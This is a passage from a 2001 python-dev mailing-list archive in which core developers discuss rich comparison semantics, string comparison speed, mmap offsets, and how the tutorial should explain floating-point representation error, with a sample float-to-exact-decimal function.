bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it regardeless whether they are function call intense or fiddle with a lot of attributes. Achieving those 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. truning the VM a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging in new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams... from Rattlesnake import compiler, vm sys.use_compiler(compiler) sys.use_vm(vm) This won't make stock Python 2.3 faster, but at least provide better means for experiments in that direction. Alternative VM implementations like Stackless Python would also benefit from it. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sun May 20 23:13:04 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one at home.com Sun May 20 23:37:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . > There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3r party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway . >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free . From tim.one at home.com Mon May 21 09:53:24 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (and which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing what I believe was intended detail, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today: class C: def __lt__(x, y): print "in __lt__" return NotImplemented def __gt__(x, y): print "in __gt__" return NotImplemented C() < C() That prints in __lt__ in __gt__ in __gt__ in __lt__ I don't know to explain why each method gets called twice (well, I do, but it's hard to swallow ). Again this can have semantic consequences, e.g. if the methods have side-effects; and unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()? Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett at stsci.edu Mon May 21 14:17:09 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. > > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin at loewis.home.cs.tu-berlin.de Mon May 21 18:44:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 21 19:03:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one at home.com Mon May 21 20:29:02 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly apprectiated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats: >>> f2ds(10 * 3.14) '31400000000000002131628207280300557613372802734375e-48' >>> I'm sure newbies would feel assured by that . def f2ds(x): """Return float x as exact decimal string. The string is of the form: "-", if and only if x is < 0. One or more decimal digits. The last digit is not 0 unless x is 0. "e" The exponent, a (possibly signed) integer """ import math # XXX ignoring infinities and NaNs for now. if x == 0: return "0e0" sign = "" if x < 0: sign = "-" x = -x f, e = math.frexp(x) assert 0.5 <= f < 1.0 # x = f * 2**e exactly # Suck up CHUNK bits at a time; 28 is enough so that we suck # up all bits in 2 iterations for all known binary double- # precision formats, and small enough to fit in an int. CHUNK = 28 top = 0L # invariant: x = (top + f) * 2**e exactly while f: f = math.ldexp(f, CHUNK) digit = int(f) assert digit >> CHUNK == 0 top = (top << CHUNK) | digit f -= digit assert 0.0 <= f < 1.0 e -= CHUNK assert top > 0 # Now x = top * 2**e exactly. Get rid of trailing 0 bits if e < 0 # (purely to increase efficiency a little later -- this loop can # be removed without changing the result). while e < 0 and top & 1 == 0: top >>= 1 e += 1 # Transform this into an equal value top' * 10**e'. if e > 0: top <<= e e = 0 elif e < 0: # Exact is top/2**-e. Multiply top and bottom by 5**-e to # get top*5**-e/10**-e = top*5**-e * 10**e top *= 5L**-e # Nuke trailing (decimal) zeroes. while 1: assert top > 0 newtop, rem = divmod(top, 10L) if rem: break top = newtop e += 1 return "%s%de%d" % (sign, top, e) From guido at digicool.com Mon May 21 21:02:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms? > I can certainly explain that this is so, and even why, but unsure > the tutorial is the right place for it. In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie wou is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:09:04 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:35:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:42:15 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:57:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) > The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at cj42289-a.reston1.va.home.com Mon May 21 23:47:35 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim at digicool.com Mon May 21 23:57:22 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first: + FixedPoint is not in the distribution. + There is no PEP for Decimal. + Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much). For the rest, + Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code. + Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE- 754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception). + Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido at digicool.com Tue May 22 00:33:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE- > 754 standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. --Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH at ActiveState.com Tue May 22 01:06:39 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people wont care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see: """ Rewriting 1 J --- ~= ---- 10 2**N """ And I went "huh? Where did j and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark. From jeremy at digicool.com Tue May 22 01:13:09 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim at digicool.com Tue May 22 01:20:16 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel at digicool.com Tue May 22 01:42:49 2001 From: michel at digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9), if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you woudn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyones business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH at ActiveState.com Tue May 22 01:47:06 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark. From guido at digicool.com Tue May 22 05:22:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 22 05:55:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 22 06:02:18 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold . > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see: > > """ > Rewriting > 1 J > --- ~= ---- > 10 2**N > """ > > And I went "huh? Where did j and N spring from?". Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply 